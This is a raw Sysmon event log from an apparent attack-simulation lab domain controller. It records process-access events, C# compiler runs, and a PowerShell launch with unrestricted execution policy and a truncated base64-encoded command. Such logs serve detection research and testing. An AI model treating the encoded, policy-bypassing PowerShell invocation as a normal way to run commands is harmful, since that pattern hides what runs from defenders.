08:40:26.962{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000406Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.962{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000405Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.962{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000404Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.962{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000403Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.962{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000402Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.962{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000401Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.962{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000400Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.962{5D479F2C-14FE-5F84-0500-000000007E01}6401148C:\Windows\system32\csrss.exe{5D479F2C-167A-5F84-0D03-000000007E01}5100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000399Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.962{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000398Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.962{5D479F2C-167A-5F84-0C03-000000007E01}42444100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{5D479F2C-167A-5F84-0D03-000000007E01}5100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000397Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.975{5D479F2C-167A-5F84-0D03-000000007E01}5100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESDDC5.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCC80B3BB7D05A4645AE54C1E79FD893C3.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167A-5F84-77B4-110000000000}0x11b4770HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{5D479F2C-167A-5F84-0C03-000000007E01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\adoupm4p.cmdline" 10341000x8000000000000000396Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-167A-5F84-0703-000000007E01}50444736C:\Windows\system32\conhost.exe{5D479F2C-167A-5F84-0C03-000000007E01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000395Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000394Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000393Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000392Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000391Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000390Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000389Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000388Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000387Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000386Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-14FE-5F84-0500-000000007E01}640760C:\Windows\system32\csrss.exe{5D479F2C-167A-5F84-0C03-000000007E01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000385Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.884{5D479F2C-167A-5F84-0A03-000000007E01}18322316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-167A-5F84-0C03-000000007E01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+7c19a9|UNKNOWN(00007FF9E2EAB68F) 154100x8000000000000000384Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.890{5D479F2C-167A-5F84-0C03-000000007E01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\adoupm4p.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167A-5F84-77B4-110000000000}0x11b4770HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAd